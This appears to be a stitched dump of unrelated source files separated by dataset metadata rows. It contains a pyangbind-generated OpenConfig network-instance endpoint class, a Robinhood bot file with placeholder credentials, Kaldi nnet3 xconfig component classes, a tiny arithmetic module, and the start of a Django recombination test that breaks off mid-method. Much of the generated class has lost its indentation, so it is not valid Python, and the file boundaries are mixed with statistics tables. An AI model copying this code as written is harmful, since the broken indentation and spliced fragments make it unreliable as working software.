                namespace="http://openconfig.net/yang/network-instance",
                defining_module="openconfig-network-instance",
                yang_type="container",
                is_config=True,
            )
        except (TypeError, ValueError):
            raise ValueError(
                {
                    "error-string": """remote must be of a type compatible with container""",
                    "defined-type": "container",
                    "generated-type": """YANGDynClass(base=remote.remote, is_container='container', yang_name="remote", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True)""",
                }
            )
        self.__remote = t
        if hasattr(self, "_set"):
            self._set()

    def _unset_remote(self):
        # Reset remote to a fresh default container.
        self.__remote = YANGDynClass(
            base=remote.remote,
            is_container="container",
            yang_name="remote",
            parent=self,
            path_helper=self._path_helper,
            extmethods=self._extmethods,
            register_paths=True,
            extensions=None,
            namespace="http://openconfig.net/yang/network-instance",
            defining_module="openconfig-network-instance",
            yang_type="container",
            is_config=True,
        )

    # Public property façade over the generated getters/setters
    # (__builtin__.property is the PY2/PY3-compatible alias set up above).
    endpoint_id = __builtin__.property(_get_endpoint_id, _set_endpoint_id)
    config = __builtin__.property(_get_config, _set_config)
    state = __builtin__.property(_get_state, _set_state)
    local_ = __builtin__.property(_get_local_, _set_local_)
    remote = __builtin__.property(_get_remote, _set_remote)

    # Ordered registry of YANG child elements; drives the copy-constructor
    # and pyangbind serialisation.
    _pyangbind_elements = OrderedDict(
        [
            ("endpoint_id", endpoint_id),
            ("config", config),
            ("state", state),
            ("local_", local_),
            ("remote", remote),
        ]
    )
from . import config
from . import state
from . import local_
from . import remote
class endpoint(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-network-instance-l2 - based on the path /network-instances/network-instance/connection-points/connection-point/endpoints/endpoint. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: A list of the endpoints (interfaces or remote
connection points that can be used for this
connection point). The active endpoint is selected
based on the precedence that it is configured
with
"""
__slots__ = (
"_path_helper",
"_extmethods",
"__endpoint_id",
"__config",
"__state",
"__local_",
"__remote",
)
_yang_name = "endpoint"
_pybind_generated_by = "container"
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__endpoint_id = YANGDynClass(
base=six.text_type,
is_leaf=True,
yang_name="endpoint-id",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
is_keyval=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="leafref",
is_config=True,
)
self.__config = YANGDynClass(
base=config.config,
is_container="container",
yang_name="config",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="container",
is_config=True,
)
self.__state = YANGDynClass(
base=state.state,
is_container="container",
yang_name="state",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="container",
is_config=True,
)
self.__local_ = YANGDynClass(
base=local_.local_,
is_container="container",
yang_name="local",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="container",
is_config=True,
)
self.__remote = YANGDynClass(
base=remote.remote,
is_container="container",
yang_name="remote",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="container",
is_config=True,
)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path() + [self._yang_name]
else:
return [
"network-instances",
"network-instance",
"connection-points",
"connection-point",
"endpoints",
"endpoint",
]
def _get_endpoint_id(self):
"""
Getter method for endpoint_id, mapped from YANG variable /network_instances/network_instance/connection_points/connection_point/endpoints/endpoint/endpoint_id (leafref)
YANG Description: A pointer to the configured identifier for the
endpoint
"""
return self.__endpoint_id
def _set_endpoint_id(self, v, load=False):
"""
Setter method for endpoint_id, mapped from YANG variable /network_instances/network_instance/connection_points/connection_point/endpoints/endpoint/endpoint_id (leafref)
If this variable is read-only (config: false) in the
source YANG file, then _set_endpoint_id is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_endpoint_id() directly.
YANG Description: A pointer to the configured identifier for the
endpoint
"""
parent = getattr(self, "_parent", None)
if parent is not None and load is False:
raise AttributeError(
"Cannot set keys directly when" + " within an instantiated list"
)
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=six.text_type,
is_leaf=True,
yang_name="endpoint-id",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
is_keyval=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="leafref",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """endpoint_id must be of a type compatible with leafref""",
"defined-type": "leafref",
"generated-type": """YANGDynClass(base=six.text_type, is_leaf=True, yang_name="endpoint-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='leafref', is_config=True)""",
}
)
self.__endpoint_id = t
if hasattr(self, "_set"):
self._set()
def _unset_endpoint_id(self):
self.__endpoint_id = YANGDynClass(
base=six.text_type,
is_leaf=True,
yang_name="endpoint-id",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
is_keyval=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="leafref",
is_config=True,
)
def _get_config(self):
"""
Getter method for config, mapped from YANG variable /network_instances/network_instance/connection_points/connection_point/endpoints/endpoint/config (container)
YANG Description: Configuration parameters relating to the
endpoint
"""
return self.__config
def _set_config(self, v, load=False):
"""
Setter method for config, mapped from YANG variable /network_instances/network_instance/connection_points/connection_point/endpoints/endpoint/config (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_config is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_config() directly.
YANG Description: Configuration parameters relating to the
endpoint
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=config.config,
is_container="container",
yang_name="config",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="container",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """config must be of a type compatible with container""",
"defined-type": "container",
"generated-type": """YANGDynClass(base=config.config, is_container='container', yang_name="config", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True)""",
}
)
self.__config = t
if hasattr(self, "_set"):
self._set()
def _unset_config(self):
self.__config = YANGDynClass(
base=config.config,
is_container="container",
yang_name="config",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="container",
is_config=True,
)
def _get_state(self):
"""
Getter method for state, mapped from YANG variable /network_instances/network_instance/connection_points/connection_point/endpoints/endpoint/state (container)
YANG Description: Operational state parameters relating to the
endpoint
"""
return self.__state
def _set_state(self, v, load=False):
"""
Setter method for state, mapped from YANG variable /network_instances/network_instance/connection_points/connection_point/endpoints/endpoint/state (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_state is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_state() directly.
YANG Description: Operational state parameters relating to the
endpoint
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=state.state,
is_container="container",
yang_name="state",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="container",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """state must be of a type compatible with container""",
"defined-type": "container",
"generated-type": """YANGDynClass(base=state.state, is_container='container', yang_name="state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True)""",
}
)
self.__state = t
if hasattr(self, "_set"):
self._set()
def _unset_state(self):
    """Reset the 'state' child back to a fresh, empty container instance."""
    # Rebuild the YANGDynClass wrapper with the same generated metadata
    # that _set_state uses, discarding any previously-set contents.
    self.__state = YANGDynClass(
        base=state.state,
        is_container="container",
        yang_name="state",
        namespace="http://openconfig.net/yang/network-instance",
        defining_module="openconfig-network-instance",
        yang_type="container",
        parent=self,
        path_helper=self._path_helper,
        extmethods=self._extmethods,
        register_paths=True,
        extensions=None,
        is_config=True,
    )
def _get_local_(self):
    """Return the 'local' container child.

    Maps the YANG path /network_instances/network_instance/connection_points/
    connection_point/endpoints/endpoint/local (configuration and operational
    state parameters relating to a local interface).
    """
    current = self.__local_
    return current
def _set_local_(self, v, load=False):
    """
    Setter method for local_, mapped from YANG variable /network_instances/network_instance/connection_points/connection_point/endpoints/endpoint/local (container)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_local_ is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_local_() directly.
    YANG Description: Configuration and operational state parameters
    relating to a local interface
    """
    # Unwrap values carrying a '_utype' coercion hook before validation.
    if hasattr(v, "_utype"):
        v = v._utype(v)
    try:
        # Re-wrap the incoming value so it is validated against the
        # generated 'local' container type.
        t = YANGDynClass(
            v,
            base=local_.local_,
            is_container="container",
            yang_name="local",
            parent=self,
            path_helper=self._path_helper,
            extmethods=self._extmethods,
            register_paths=True,
            extensions=None,
            namespace="http://openconfig.net/yang/network-instance",
            defining_module="openconfig-network-instance",
            yang_type="container",
            is_config=True,
        )
    except (TypeError, ValueError):
        # Report a structured error describing the expected generated type.
        raise ValueError(
            {
                "error-string": """local_ must be of a type compatible with container""",
                "defined-type": "container",
                "generated-type": """YANGDynClass(base=local_.local_, is_container='container', yang_name="local", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True)""",
            }
        )
    self.__local_ = t
    # Propagate the change notification if the tree supports it.
    if hasattr(self, "_set"):
        self._set()
def _unset_local_(self):
    """Reset the 'local' child back to a fresh, empty container instance."""
    # Rebuild the YANGDynClass wrapper with the same generated metadata
    # that _set_local_ uses, discarding any previously-set contents.
    self.__local_ = YANGDynClass(
        base=local_.local_,
        is_container="container",
        yang_name="local",
        namespace="http://openconfig.net/yang/network-instance",
        defining_module="openconfig-network-instance",
        yang_type="container",
        parent=self,
        path_helper=self._path_helper,
        extmethods=self._extmethods,
        register_paths=True,
        extensions=None,
        is_config=True,
    )
def _get_remote(self):
    """Return the 'remote' container child.

    Maps the YANG path /network_instances/network_instance/connection_points/
    connection_point/endpoints/endpoint/remote (configuration and operational
    state parameters relating to a remote interface).
    """
    current = self.__remote
    return current
def _set_remote(self, v, load=False):
    """
    Setter method for remote, mapped from YANG variable /network_instances/network_instance/connection_points/connection_point/endpoints/endpoint/remote (container)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_remote is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_remote() directly.
    YANG Description: Configuration and operational state parameters
    relating to a remote interface
    """
    # Unwrap values carrying a '_utype' coercion hook before validation.
    if hasattr(v, "_utype"):
        v = v._utype(v)
    try:
        # Re-wrap the incoming value so it is validated against the
        # generated 'remote' container type.
        t = YANGDynClass(
            v,
            base=remote.remote,
            is_container="container",
            yang_name="remote",
            parent=self,
            path_helper=self._path_helper,
            extmethods=self._extmethods,
            register_paths=True,
            extensions=None,
            namespace="http://openconfig.net/yang/network-instance",
            defining_module="openconfig-network-instance",
            yang_type="container",
            is_config=True,
        )
    except (TypeError, ValueError):
        # Report a structured error describing the expected generated type.
        raise ValueError(
            {
                "error-string": """remote must be of a type compatible with container""",
                "defined-type": "container",
                "generated-type": """YANGDynClass(base=remote.remote, is_container='container', yang_name="remote", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True)""",
            }
        )
    self.__remote = t
    # Propagate the change notification if the tree supports it.
    if hasattr(self, "_set"):
        self._set()
def _unset_remote(self):
    """Reset the 'remote' child back to a fresh, empty container instance."""
    # Rebuild the YANGDynClass wrapper with the same generated metadata
    # that _set_remote uses, discarding any previously-set contents.
    self.__remote = YANGDynClass(
        base=remote.remote,
        is_container="container",
        yang_name="remote",
        namespace="http://openconfig.net/yang/network-instance",
        defining_module="openconfig-network-instance",
        yang_type="container",
        parent=self,
        path_helper=self._path_helper,
        extmethods=self._extmethods,
        register_paths=True,
        extensions=None,
        is_config=True,
    )
# Public properties wiring each YANG child to its generated getter/setter.
endpoint_id = __builtin__.property(_get_endpoint_id, _set_endpoint_id)
config = __builtin__.property(_get_config, _set_config)
state = __builtin__.property(_get_state, _set_state)
local_ = __builtin__.property(_get_local_, _set_local_)
remote = __builtin__.property(_get_remote, _set_remote)
# Ordered registry of this container's children; the ordering matters —
# pyangbind iterates it to serialize elements in YANG schema order.
_pyangbind_elements = OrderedDict(
    [
        ("endpoint_id", endpoint_id),
        ("config", config),
        ("state", state),
        ("local_", local_),
        ("remote", remote),
    ]
)
| 38.933594
| 377
| 0.604144
| 4,120
| 39,868
| 5.604854
| 0.049029
| 0.068855
| 0.049714
| 0.056383
| 0.983761
| 0.974363
| 0.974363
| 0.974363
| 0.974363
| 0.974363
| 0
| 0.000648
| 0.303502
| 39,868
| 1,023
| 378
| 38.971652
| 0.830957
| 0.218546
| 0
| 0.882813
| 0
| 0.013021
| 0.254554
| 0.083497
| 0
| 0
| 0
| 0
| 0
| 1
| 0.044271
| false
| 0
| 0.029948
| 0
| 0.11849
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2cadbc9eac6e1b55c93b12a413fe375e0ad6108d
| 132
|
py
|
Python
|
acct.py
|
rmdmattingly/QCI-Robinhood-Bot
|
838e077a4338d8b63fc155d7b49b1bbbe389e489
|
[
"MIT"
] | null | null | null |
acct.py
|
rmdmattingly/QCI-Robinhood-Bot
|
838e077a4338d8b63fc155d7b49b1bbbe389e489
|
[
"MIT"
] | null | null | null |
acct.py
|
rmdmattingly/QCI-Robinhood-Bot
|
838e077a4338d8b63fc155d7b49b1bbbe389e489
|
[
"MIT"
] | null | null | null |
# Account credentials for the Robinhood bot. These are placeholders the
# user is expected to replace before running.
# NOTE(review): storing real credentials in plaintext source is a security
# risk — prefer environment variables or a secrets manager.
username = 'UPDATE_TO_YOUR_ROBINHOOD_USERNAME'  # Robinhood login name
password = 'UPDATE_TO_YOUR_ROBINHOOD_PASSWORD'  # Robinhood password
key = 'UPDATE_TO_YOUR_QUIKFO_API_KEY'  # Quikfo API key
| 33
| 46
| 0.863636
| 19
| 132
| 5.315789
| 0.473684
| 0.237624
| 0.356436
| 0.415842
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.068182
| 132
| 3
| 47
| 44
| 0.821138
| 0
| 0
| 0
| 0
| 0
| 0.719697
| 0.719697
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.333333
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
e2e7cfc5028c3c92d359e9123726e5918c93f739
| 10,572
|
py
|
Python
|
egs/wsj/s5/steps/libs/nnet3/xconfig/added_components.py
|
XIEXurong/kaldi_bayes_adapt
|
54d108361fe881667055aa0f299f9658ad3585f8
|
[
"Apache-2.0"
] | 1
|
2022-02-09T16:05:18.000Z
|
2022-02-09T16:05:18.000Z
|
egs/wsj/s5/steps/libs/nnet3/xconfig/added_components.py
|
XIEXurong/kaldi_bayes_adapt
|
54d108361fe881667055aa0f299f9658ad3585f8
|
[
"Apache-2.0"
] | null | null | null |
egs/wsj/s5/steps/libs/nnet3/xconfig/added_components.py
|
XIEXurong/kaldi_bayes_adapt
|
54d108361fe881667055aa0f299f9658ad3585f8
|
[
"Apache-2.0"
] | null | null | null |
from __future__ import print_function
import math
import re
import sys
from libs.nnet3.xconfig.basic_layers import XconfigLayerBase
class XconfigDimRangeComponentInit(XconfigLayerBase):
    """Parses xconfig lines like:
      'dim-range-component name=feature1 input=Append(-3,0,3) dim=40 dim-offset=0'
    which produce a single dim-range-node selecting part of the input.

    Parameters of the class, and their defaults:
      input='[-1]'   [Descriptor giving the input of the layer.]
      dim=-1         [Dimension of the output.]
      dim-offset=0   [Dimension offset of the input.]
    """

    def __init__(self, first_token, key_to_value, prev_names=None):
        XconfigLayerBase.__init__(self, first_token, key_to_value, prev_names)

    def set_default_configs(self):
        self.config = {'input': '[-1]', 'dim': -1, 'dim-offset': 0}

    def check_configs(self):
        in_dim = self.descriptors['input']['dim']
        out_dim = self.config['dim']
        offset = self.config['dim-offset']
        if out_dim <= 0:
            raise RuntimeError("'dim' must be specified and > 0.")
        if out_dim > in_dim:
            raise RuntimeError("'dim' must be specified and lower than the input dim.")
        if offset < 0:
            raise RuntimeError("'dim-offset' must be specified and >= 0.")
        if offset + out_dim > in_dim:
            raise RuntimeError("'dim-offset' plus output dim must be lower than the input dim.")

    def output_name(self, auxiliary_output=None):
        assert auxiliary_output is None
        return self.name

    def output_dim(self, auxiliary_output=None):
        assert auxiliary_output is None
        out_dim = self.config['dim']
        if out_dim <= 0:
            # Default the config to the input dimension when dim was not set.
            self.config['dim'] = self.descriptors['input']['dim']
        return out_dim

    def get_full_config(self):
        # We do not support user-specified matrices in this layer, so the
        # 'init', 'ref' and 'final' configs are all the same.
        return [(config_name, line)
                for line in self._generate_config()
                for config_name in ['init', 'ref', 'final']]

    def _generate_config(self):
        # 'final-string' is the descriptor rendered with the 'final' names of
        # nodes, i.e. the form that can appear in config files.
        input_node = self.descriptors['input']['final-string']
        return ['dim-range-node name={0} input-node={1} dim={2} dim-offset={3}'.format(
            self.name, input_node, self.config['dim'], self.config['dim-offset'])]
class XconfigElementwiseProductComponent(XconfigLayerBase):
    """Parses xconfig lines like:
      'elementwise-product-component name=noop1 input=Append(-3,0,3) dim=40'
    which produce a single component of type ElementwiseProductComponent.

    Parameters of the class, and their defaults:
      input='[-1]'   [Descriptor giving the input of the layer.]
      dim=-1         [Output dimension; must divide the input dimension.]
    """

    def __init__(self, first_token, key_to_value, prev_names=None):
        XconfigLayerBase.__init__(self, first_token, key_to_value, prev_names)

    def set_default_configs(self):
        self.config = {'input': '[-1]', 'dim': -1}

    def check_configs(self):
        in_dim = self.descriptors['input']['dim']
        out_dim = self.config['dim']
        if out_dim <= 0:
            raise RuntimeError("'dim' must be specified and > 0.")
        if out_dim > in_dim:
            raise RuntimeError("'dim' must be specified and lower than the input dim.")
        if in_dim % out_dim != 0:
            raise RuntimeError("input dim must be some times of the 'dim'.")

    def output_name(self, auxiliary_output=None):
        assert auxiliary_output is None
        return self.name

    def output_dim(self, auxiliary_output=None):
        assert auxiliary_output is None
        out_dim = self.config['dim']
        if out_dim <= 0:
            # Default the config to the input dimension when dim was not set.
            self.config['dim'] = self.descriptors['input']['dim']
        return out_dim

    def get_full_config(self):
        # We do not support user-specified matrices in this layer, so the
        # 'ref' and 'final' configs are the same.
        return [(config_name, line)
                for line in self._generate_config()
                for config_name in ['ref', 'final']]

    def _generate_config(self):
        # 'final-string' is the descriptor rendered with the 'final' names of
        # nodes, i.e. the form that can appear in config files.
        input_desc = self.descriptors['input']['final-string']
        input_dim = self.descriptors['input']['dim']
        output_dim = self.config['dim']
        return [
            'component name={0} type=ElementwiseProductComponent output-dim={1} input-dim={2}'.format(
                self.name, output_dim, input_dim),
            'component-node name={0} component={0} input={1}'.format(
                self.name, input_desc),
        ]
class XconfigSimpleComponent(XconfigLayerBase):
    """Parses xconfig lines like:
      'simple-component name=scale type=FixedScaleComponent dim=1536 opts="scale=2 dim=1536"'
    which produce a single component of a user-specified type, with the
    raw option string passed straight through to the config.

    Parameters of the class, and their defaults:
      input='[-1]'   [Descriptor giving the input of the layer.]
      dim=-1         [Output dimension; defaults to the input dimension.]
      type, opts     [Required: component type name and its option string.]
    """

    def __init__(self, first_token, key_to_value, prev_names=None):
        XconfigLayerBase.__init__(self, first_token, key_to_value, prev_names)

    def set_default_configs(self):
        self.config = {'input': '[-1]',
                       'dim': -1,
                       'type': 'error',
                       'opts': 'error'}

    def check_configs(self):
        pass

    def output_name(self, auxiliary_output=None):
        assert auxiliary_output is None
        return self.name

    def output_dim(self, auxiliary_output=None):
        assert auxiliary_output is None
        out_dim = self.config['dim']
        if out_dim <= 0:
            # Default the config to the input dimension when dim was not set.
            self.config['dim'] = self.descriptors['input']['dim']
        return out_dim

    def get_full_config(self):
        # We do not support user-specified matrices in this layer, so the
        # 'ref' and 'final' configs are the same.
        return [(config_name, line)
                for line in self._generate_config()
                for config_name in ['ref', 'final']]

    def _generate_config(self):
        # 'final-string' is the descriptor rendered with the 'final' names of
        # nodes, i.e. the form that can appear in config files.
        input_desc = self.descriptors['input']['final-string']
        return [
            'component name={0} type={1} {2}'.format(
                self.name, self.config['type'], self.config['opts']),
            'component-node name={0} component={0} input={1}'.format(
                self.name, input_desc),
        ]
class XconfigCompositeComponent(XconfigLayerBase):
    """Parses xconfig lines describing a composite of several sub-components.

    Parameters of the class, and their defaults:
      input='[-1]'            [Descriptor giving the input of the layer.]
      dim=-1                  [Output dimension; defaults to the input dim.]
      max_rows_process=2048
      num_components=1        [How many componentN entries are used.]
      component1..component11 [Config string for each sub-component; the
                               first num_components of them must be set.]
    """
    def __init__(self, first_token, key_to_value, prev_names=None):
        XconfigLayerBase.__init__(self, first_token, key_to_value, prev_names)
    def set_default_configs(self):
        self.config = {'input': '[-1]',
                       'dim': -1,
                       'max_rows_process': 2048,
                       'num_components': 1,
                       'component1': 'error',
                       'component2': 'error',
                       'component3': 'error',
                       'component4': 'error',
                       'component5': 'error',
                       'component6': 'error',
                       'component7': 'error',
                       'component8': 'error',
                       'component9': 'error',
                       'component10': 'error',
                       'component11': 'error'}
    def check_configs(self):
        pass
    def output_name(self, auxiliary_output=None):
        assert auxiliary_output is None
        return self.name
    def output_dim(self, auxiliary_output=None):
        assert auxiliary_output is None
        output_dim = self.config['dim']
        if output_dim <= 0:
            # Default the config to the input dimension when dim was not set.
            self.config['dim'] = self.descriptors['input']['dim']
        return output_dim
    def get_full_config(self):
        ans = []
        config_lines = self._generate_config()
        for line in config_lines:
            for config_name in ['ref', 'final']:
                # we do not support user specified matrices in this layer
                # so 'ref' and 'final' configs are the same.
                ans.append((config_name, line))
        return ans
    def _generate_config(self):
        # by 'descriptor_final_string' we mean a string that can appear in
        # config-files, i.e. it contains the 'final' names of nodes.
        input_desc = self.descriptors['input']['final-string']
        max_rows_process = self.config['max_rows_process']
        num_components = self.config['num_components']
        sub_components = []
        # Sub-component configs are keyed 'component1'..'componentN' (1-based).
        # BUG FIX: the original looped over range(num_components) (0-based,
        # yielding the nonexistent key 'component0') and looked up the literal
        # string 'temp1' instead of the computed key, which always raised
        # KeyError.
        for i in range(1, num_components + 1):
            key = 'component' + str(i)
            value = self.config[key]
            sub_components.append(key + '=' + "\'" + value + "\'")
        sub_component_all = ' '.join(sub_components)
        configs = []
        line = ('component name={0} max_rows_process={1} num_components={2} {3}'.format(
            self.name, max_rows_process, num_components, sub_component_all))
        configs.append(line)
        line = ('component-node name={0} component={0} input={1}'.format(
            self.name, input_desc))
        configs.append(line)
        return configs
| 38.443636
| 106
| 0.61417
| 1,307
| 10,572
| 4.800306
| 0.119357
| 0.047816
| 0.043513
| 0.032993
| 0.805228
| 0.777016
| 0.754861
| 0.748805
| 0.721549
| 0.715811
| 0
| 0.013112
| 0.271377
| 10,572
| 274
| 107
| 38.583942
| 0.801376
| 0.20961
| 0
| 0.71123
| 0
| 0.005348
| 0.156679
| 0.00389
| 0.005348
| 0
| 0
| 0
| 0.042781
| 1
| 0.149733
| false
| 0.010695
| 0.026738
| 0
| 0.283422
| 0.005348
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e2f3968c3b87e6ca96e984a7bef4d554fdf3bb99
| 131
|
py
|
Python
|
Workers/PythonEvaluation/Executables/Calculation.py
|
IshmaGurca/SwarmAnalytics
|
81688dac4d32d568cfac218224a45cbf048b2af9
|
[
"MIT"
] | null | null | null |
Workers/PythonEvaluation/Executables/Calculation.py
|
IshmaGurca/SwarmAnalytics
|
81688dac4d32d568cfac218224a45cbf048b2af9
|
[
"MIT"
] | null | null | null |
Workers/PythonEvaluation/Executables/Calculation.py
|
IshmaGurca/SwarmAnalytics
|
81688dac4d32d568cfac218224a45cbf048b2af9
|
[
"MIT"
] | null | null | null |
def Plus(a,b):
return a + b
def Minus(a,b):
return a - b
def Times(a,b):
return a*b
def Divide(a,b):
return a/b
| 10.916667
| 16
| 0.549618
| 28
| 131
| 2.571429
| 0.285714
| 0.222222
| 0.444444
| 0.5
| 0.680556
| 0.541667
| 0
| 0
| 0
| 0
| 0
| 0
| 0.29771
| 131
| 11
| 17
| 11.909091
| 0.782609
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
1a4f3c0b0d7270eda2eca3fb8c1cdd937d5a0ff6
| 41,255
|
py
|
Python
|
src/edge/tests/test_recombine.py
|
jvrana/edge
|
b38efc3dfe3e888ee3045539bc00152771baccc0
|
[
"MIT"
] | null | null | null |
src/edge/tests/test_recombine.py
|
jvrana/edge
|
b38efc3dfe3e888ee3045539bc00152771baccc0
|
[
"MIT"
] | null | null | null |
src/edge/tests/test_recombine.py
|
jvrana/edge
|
b38efc3dfe3e888ee3045539bc00152771baccc0
|
[
"MIT"
] | null | null | null |
import os
import json
from Bio.Seq import Seq
from django.test import TestCase
import edge.recombine
from edge.recombine import find_swap_region, recombine, remove_overhangs
from edge.blastdb import build_all_genome_dbs, fragment_fasta_fn
from edge.models import Genome, Fragment, Genome_Fragment, Operation
class RemoveOverhangsTest(TestCase):
    """Unit tests for remove_overhangs' handling of '(.../)' overhang markers."""

    def test_removes_front_overhang(self):
        result = remove_overhangs('(atg/)aa')
        self.assertEquals(result, 'aa')

    def test_removes_back_overhang(self):
        result = remove_overhangs('aa(atg/)')
        self.assertEquals(result, 'aa')

    def test_removes_front_and_back(self):
        result = remove_overhangs('(atg/)aa(atg/)')
        self.assertEquals(result, 'aa')

    def test_does_not_remove_internal_overhang(self):
        # Only overhangs at the very ends are stripped.
        result = remove_overhangs('(atg/)a(atg/)a(atg/)')
        self.assertEquals(result, 'a(atg/)a')

    def test_does_not_remove_unclosed_overhang(self):
        # An overhang missing its opening or closing marker is left alone.
        self.assertEquals(remove_overhangs('(atg/aa'), '(atg/aa')
        self.assertEquals(remove_overhangs('atg/aa)'), 'atg/aa)')

    def test_works_with_single_char_input(self):
        self.assertEquals(remove_overhangs(')'), ')')
        self.assertEquals(remove_overhangs('('), '(')
class GenomeRecombinationTest(TestCase):
def setUp(self):
    """Shrink edge.recombine's junction-check windows so the short test
    sequences used here are long enough; originals are saved for tearDown."""
    # Save the module-level tunables first so tearDown can restore them.
    self.old_check_junction_lu = edge.recombine.CHECK_JUNCTION_LEFT_UP
    self.old_check_junction_ld = edge.recombine.CHECK_JUNCTION_LEFT_DN
    self.old_check_junction_ru = edge.recombine.CHECK_JUNCTION_RIGHT_UP
    self.old_check_junction_rd = edge.recombine.CHECK_JUNCTION_RIGHT_DN
    self.old_single_cross_over_gap_max = edge.recombine.SINGLE_CROSSOVER_MAX_GAP
    # Now install the small test-friendly values.
    edge.recombine.CHECK_JUNCTION_LEFT_UP = 10
    edge.recombine.CHECK_JUNCTION_LEFT_DN = 40
